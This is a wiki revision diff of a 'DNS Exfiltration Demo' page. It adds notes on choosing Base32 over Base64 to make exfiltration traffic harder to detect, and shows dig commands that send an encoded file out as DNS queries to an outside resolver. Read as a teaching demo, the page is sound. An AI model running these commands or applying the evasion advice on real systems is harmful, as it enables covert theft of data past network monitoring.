Differences

This shows you the differences between two versions of the page.

--- dns:dns_exfiltration [2023/10/02 15:11] – [Simple Exfiltration] bstafford
+++ dns:dns_exfiltration [2023/11/29 15:02] (current) – [DNS Exfiltration Demo] bstafford
@@ Line 1: / Line 1: @@
 ===== DNS Exfiltration Demo =====
 [[https://hinty.io/devforth/dns-exfiltration-of-data-step-by-step-simple-guide/|Guide here]]
+===== Base64 =====
+Base64. Contains uppercase letters and defaults to allowing = and / etc. This is not recommended as it can make it easier to detect attacks as 'normal' DNS doesn't use these. Use Base32 instead.
+However, Base32 isn't available natively in many scripting toolsets. Base64 is. So some attackers use Base64 to avoid having to write their own Base32 conversion code.
@@ Line 42: / Line 48: @@
 # The result is a file that contains a huge list of FQDN's for us to query (exfiltrate)
-for i in $(cat $ENCRYPTED); do dig +short A @$LOCALDNS $i;sleep 0.1 ;done
+# Exfiltrate the file with DIG.
+dig +short A @$LOCALDNS -f $ENCRYPTED
+# Delay if required.
+#for i in $(cat $ENCRYPTED); do dig +short A @$LOCALDNS $i;sleep 0.1 ;done
-# OR - Use DIG to iterate over the file and resolve the DNS at full speed.
-#dig +short A @$LOCALDNS -f $ENCRYPTED
 ## The following commands get run on the command auth DNS server.